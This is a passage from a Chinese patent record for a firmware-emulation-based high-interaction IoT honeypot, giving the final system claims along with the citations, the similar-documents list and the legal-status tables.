the cloud server input information acquisition module is used for configuring a communicator used for communication between the honey pot system and the cloud servers by building the honey pot system on the cloud servers and collecting input information of all the cloud servers;
the cloud server input information verification module is used for reconstructing the input information of the cloud server according to the alarm information of the firmware and the input information of triggering the alarm, verifying whether the input information of the cloud server triggers the vulnerability or not and capturing threat information.
7. The firmware emulation-based high-interaction internet of things honeypot deployment system of claim 6, wherein the alert information acquisition module comprises:
the boundary binary file searching sub-module is used for decompressing and decrypting the firmware image to obtain a corresponding file system; analyzing each binary file in the file system, searching codes related to the network service contained in the binary file, taking the binary file with the codes related to the network service as a boundary binary file, simulating program execution by using a symbol execution technology, determining all code paths possibly encountered by the program during operation, and detecting the code paths related to the network service;
the binary dependency graph construction submodule is used for constructing a binary dependency graph according to the communication modes among the binary files;
and the loophole searching sub-module is used for tracking the program data flow by utilizing a static stain analysis technology according to the binary dependency graph, and acquiring alarm information, input information for triggering an alarm and an vulnerable execution path.
8. An electronic device comprising a memory and a processor, wherein the memory is coupled to the processor; the memory is used for storing program data, and the processor is used for executing the program data to realize the high-interaction internet of things honeypot deployment method based on firmware simulation as set forth in any one of claims 1-5.
9. A computer readable storage medium having stored thereon a computer program, wherein the program when executed by a processor implements the firmware emulation-based high-interaction internet of things honeypot deployment method of any of claims 1-5.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202310763186.5A CN116502226B (en) | 2023-06-27 | 2023-06-27 | Firmware simulation-based high-interaction Internet of things honeypot deployment method and system |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202310763186.5A CN116502226B (en) | 2023-06-27 | 2023-06-27 | Firmware simulation-based high-interaction Internet of things honeypot deployment method and system |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN116502226A CN116502226A (en) | 2023-07-28 |
| CN116502226B true CN116502226B (en) | 2023-09-08 |
Family
ID=87325178
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202310763186.5A Active CN116502226B (en) | 2023-06-27 | 2023-06-27 | Firmware simulation-based high-interaction Internet of things honeypot deployment method and system |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN116502226B (en) |
Citations (5)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN101087196A (en) * | 2006-12-27 | 2007-12-12 | 北京大学 | Multi-layer honey network data transmission method and system |
| CN106850582A (en) * | 2017-01-05 | 2017-06-13 | 中国电子科技网络信息安全有限公司 | A kind of APT Advanced threat detection methods based on instruction monitoring |
| CN112417444A (en) * | 2020-12-03 | 2021-02-26 | 南京邮电大学 | Attack trapping system based on firmware simulation |
| CN113810423A (en) * | 2021-09-22 | 2021-12-17 | 中能融合智慧科技有限公司 | Industrial control honey pot |
| CN116015717A (en) * | 2022-11-30 | 2023-04-25 | 杭州安恒信息技术股份有限公司 | Network defense method, device, equipment and storage medium |
Family Cites Families (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US9503470B2 (en) * | 2002-12-24 | 2016-11-22 | Fred Herz Patents, LLC | Distributed agent based model for security monitoring and response |
| US10462181B2 (en) * | 2016-05-10 | 2019-10-29 | Quadrant Information Security | Method, system, and apparatus to identify and study advanced threat tactics, techniques and procedures |
| US20220329616A1 (en) * | 2017-11-27 | 2022-10-13 | Lacework, Inc. | Using static analysis for vulnerability detection |
-
2023
- 2023-06-27 CN CN202310763186.5A patent/CN116502226B/en active Active
Patent Citations (5)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN101087196A (en) * | 2006-12-27 | 2007-12-12 | 北京大学 | Multi-layer honey network data transmission method and system |
| CN106850582A (en) * | 2017-01-05 | 2017-06-13 | 中国电子科技网络信息安全有限公司 | A kind of APT Advanced threat detection methods based on instruction monitoring |
| CN112417444A (en) * | 2020-12-03 | 2021-02-26 | 南京邮电大学 | Attack trapping system based on firmware simulation |
| CN113810423A (en) * | 2021-09-22 | 2021-12-17 | 中能融合智慧科技有限公司 | Industrial control honey pot |
| CN116015717A (en) * | 2022-11-30 | 2023-04-25 | 杭州安恒信息技术股份有限公司 | Network defense method, device, equipment and storage medium |
Non-Patent Citations (1)
| Title |
|---|
| 基于流谱理论的SSL/TLS协议攻击检测方法;郭世泽 等;《网络与信息安全学报》;第8卷(第1期);第30-40页 * |
Also Published As
| Publication number | Publication date |
|---|---|
| CN116502226A (en) | 2023-07-28 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| Zhang et al. | An IoT honeynet based on multiport honeypots for capturing IoT attacks | |
| US10592676B2 (en) | Application security service | |
| US10581879B1 (en) | Enhanced malware detection for generated objects | |
| Lu et al. | Chex: statically vetting android apps for component hijacking vulnerabilities | |
| Schmidt et al. | Enhancing security of linux-based android devices | |
| CN104598824B (en) | A kind of malware detection methods and device thereof | |
| CN110391937B (en) | Internet of things honey net system based on SOAP service simulation | |
| CN112685737A (en) | APP detection method, device, equipment and storage medium | |
| CN112417444A (en) | Attack trapping system based on firmware simulation | |
| Trajanovski et al. | An automated and comprehensive framework for IoT botnet detection and analysis (IoT-BDA) | |
| KR101972825B1 (en) | Method and apparatus for automatically analyzing vulnerable point of embedded appliance by using hybrid analysis technology, and computer program for executing the method | |
| CN111818062A (en) | Docker-based CentOS high-interaction honeypot system and implementation method thereof | |
| Wang et al. | {MetaSymploit}:{Day-One} Defense against Script-based Attacks with {Security-Enhanced} Symbolic Analysis | |
| KR102396237B1 (en) | Apparatus for processing cyber threat information, method for processing cyber threat information, and medium for storing a program processing cyber threat information | |
| KR102424014B1 (en) | Apparatus for processing cyber threat information, method for processing cyber threat information, and medium for storing a program processing cyber threat information | |
| CN110198300B (en) | Honeypot operating system fingerprint hiding method and device | |
| Yin et al. | Automatic malware analysis: an emulator based approach | |
| US20240054210A1 (en) | Cyber threat information processing apparatus, cyber threat information processing method, and storage medium storing cyber threat information processing program | |
| CN116502226B (en) | Firmware simulation-based high-interaction Internet of things honeypot deployment method and system | |
| Ding et al. | Accurate and efficient exploit capture and classification | |
| KR102420884B1 (en) | Apparatus for processing cyber threat information, method for processing cyber threat information, and medium for storing a program processing cyber threat information | |
| Wang et al. | IoT-DeepSense: Behavioral Security Detection of IoT Devices Based on Firmware Virtualization and Deep Learning | |
| Kaur et al. | Hybrid real-time zero-day malware analysis and reporting system | |
| Furfaro et al. | Gathering Malware Data through High-Interaction Honeypots. | |
| CN111767548A (en) | Vulnerability capturing method, device, equipment and storage medium |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |